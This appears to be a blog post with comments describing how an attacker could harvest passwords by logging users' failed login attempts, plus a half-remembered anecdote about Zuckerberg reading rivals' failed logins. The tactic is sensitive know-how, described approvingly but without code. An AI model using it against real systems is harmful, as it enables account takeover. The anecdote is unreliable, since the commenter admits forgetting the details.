This is just a quick thought I had at work today -- actually, I had it in November, but just got around to posting it now. Common story, but eh?
Anyway, I was having trouble logging into our issue-tracking solution
My point? If you're an attacker and want to collect passwords for internal systems, even if you only have hashes, replace the passwords and start logging requests. I'll bet people try the same password twice, then a couple others. Suddenly, you have a bunch of passwords to try on other systems. You might even get a couple varied usernames.
Of course, that can be considered evil. But eh?
take your comment another step further... if these login failures are logged, where are the logs? and are they on the same system? in a less that protected directory? in clear text?
It is amazing what you can harvest up from logs and how insecurely most logging is handeled and stored.
Agreed.
Your post reminded me of a ha.ckers.org blog about hiding PHP code in logfiles for RFI:
http://ha.ckers.org/blog/20100128/micro-php-lfi-backdoor/
In an article about Mark Zuckerberg, about life back at Harvard when he was worried about the Winkelvoss twins and their competing web site, he used that technique. The twins apparently had accounts on facebook, so he looked at the logs (heck, he could look in the database, having wrote the app), and saw where they had logged in using the wrong password, before remembering the right one. I forget the details, but I think he used the credentials to log into their e-mail account and redirect their mail, in trying to fend off competition. Which is a bit crazy, because if you read the book by Ben Mezrich, while the Winklevoss's had a good idea which he built on, the greatness of fb was all his. So yes, good technique, works great ;)